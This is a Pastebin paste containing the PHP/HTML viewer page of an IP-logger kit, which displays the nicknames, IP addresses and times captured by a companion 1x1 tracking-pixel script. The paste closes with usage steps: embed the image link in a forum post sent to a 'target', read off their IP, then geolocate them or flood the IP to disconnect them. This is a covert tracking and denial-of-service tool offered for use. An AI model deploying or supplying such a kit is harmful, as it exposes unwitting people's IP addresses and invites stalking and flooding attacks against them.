Advertisement
andre11

raicallvul

May 16th, 2014
295
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.89 KB | None | 0 0
  1. <!-- created by KvH for public & fair use
  2. this script related to another script that creates an image
  3. with 1x1 pixel dimension in white color,
  4. complete version includes many feathers for our private community ,
  5. i do not forget a3q,testing,8Th B!T and other my buddies
  6. -->
  7. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
  8. <html>
  9. <head>
  10. <STYLE type="text/css">
  11. div{WIDTH: 472px;HEIGHT: 20px;FONT-FAMILY: tahoma;FONT-SIZE: 14px;COLOR: #000000;}
  12. span{HEIGHT: 20px;FONT-FAMILY: tahoma;FONT-SIZE: 14px;BORDER: 0px;FLOAT:left;}
  13. a{text-decoration: none;}
  14. #hdrdv{BACKGROUND-COLOR: #555555;COLOR: #AACCFF;TEXT-ALIGN: center;BORDER: #808080 1px solid;}
  15. .dlipov{z-index:2;POSITION: absolute;TOP: 5px;LEFT: 100px;WIDTH: 60px;BACKGROUND-COLOR: #BBBBBB;COLOR: #111111;TEXT-ALIGN: center;CURSOR: hand;CURSOR: pointer;BORDER: #808080 1px solid;}
  16. .dlipot{z-index:2;POSITION: absolute;TOP: 5px;LEFT: 100px;WIDTH: 60px;BACKGROUND-COLOR: #111111;COLOR: #DDDDDD;TEXT-ALIGN: center;CURSOR: hand;CURSOR: pointer;BORDER: #808080 1px solid;}
  17. .iplgzdv{BACKGROUND-COLOR: #445544;COLOR: #BB99BB;}
  18. .iplgzodv{BACKGROUND-COLOR: #223322;COLOR: #EEEEFF;}
  19. .nkspn{WIDTH: 110px;PADDING-LEFT: 10px;BORDER-RIGHT: 1px double #000000;}
  20. .ipspn{WIDTH: 130px;PADDING-LEFT: 10px;BORDER-RIGHT: 1px double #000000;}
  21. .tmspn{WIDTH: 200px;PADDING-LEFT: 10px;}
  22. .dlact{z-index:1;WIDTH: 250px;HEIGHT: 20px;BACKGROUND-COLOR: #552211;COLOR: #777777;TEXT-ALIGN:center;}
  23. </STYLE>
  24. <meta name="author" content="KvH" />
  25. <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
  26. </head>
  27. <body>
  28. <div id="hdrdv">
  29. <span class="nkspn">Nick</span><span class="ipspn">IP</span><span class="tmspn">Time</span>
  30. </div>
  31.  
  32. <?php
  33. $iplogfl="ipz.php";
  34. $delet=array_key_exists('delet', $_REQUEST) ? $_REQUEST['delet'] : null;
  35. $ipvw=basename($_SERVER['PHP_SELF']);
  36. if($delet==1){
  37. if(file_exists($iplogfl)){
  38. unlink ($iplogfl);
  39. echo "<div class=\"dlact\">liste <b>ZarT IP</b> ZarT shod :D</div>";
  40. }
  41. else{
  42. echo "<div class=\"dlact\">liste <b>ZarT IP</b> az ghabl ZarT shode :D</div>";
  43. }
  44. }
  45. if(file_exists("ipz.php")){
  46. echo "<div class=\"dlipov\" onmouseover=\"this.className='dlipot'\"
  47. onmouseout=\"this.className='dlipov'\" onclick=\"window.location='$ipvw?delet=1'\">ZarT IPz</div>";
  48. include("ipz.php");
  49. }
  50. else{
  51. echo "<div class=\"dlact\">liste <b>Zart IPz</b> khalie</div>";
  52. }
  53. ?>
  54. </body>
  55. </html>
  56.  
  57.  
  58.  
  59.  
  60.  
  61. 4- Upload the files in your Host
  62. 5- Now Script is ready to use send it like this :
  63. [image=http://yoursite.TLD/image.php][/image]
  64. 6- Go to http://yoursite.TLD/ipx.php - See , this is Your Targer's ip
  65.  
  66.  
  67. You can use the IP for manythings you can use it to find the location of that person or you can do more evil things like Flooding the IP
  68. By flooding the IP the target will be disconnected from the net
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement